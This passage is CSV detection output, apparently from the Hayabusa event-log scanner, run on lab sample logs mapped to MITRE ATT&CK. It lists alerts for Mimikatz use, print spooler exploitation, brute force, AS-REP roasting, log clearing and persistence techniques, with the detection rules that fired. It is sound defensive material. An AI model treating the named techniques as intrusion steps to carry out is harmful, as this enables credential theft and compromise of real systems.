winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 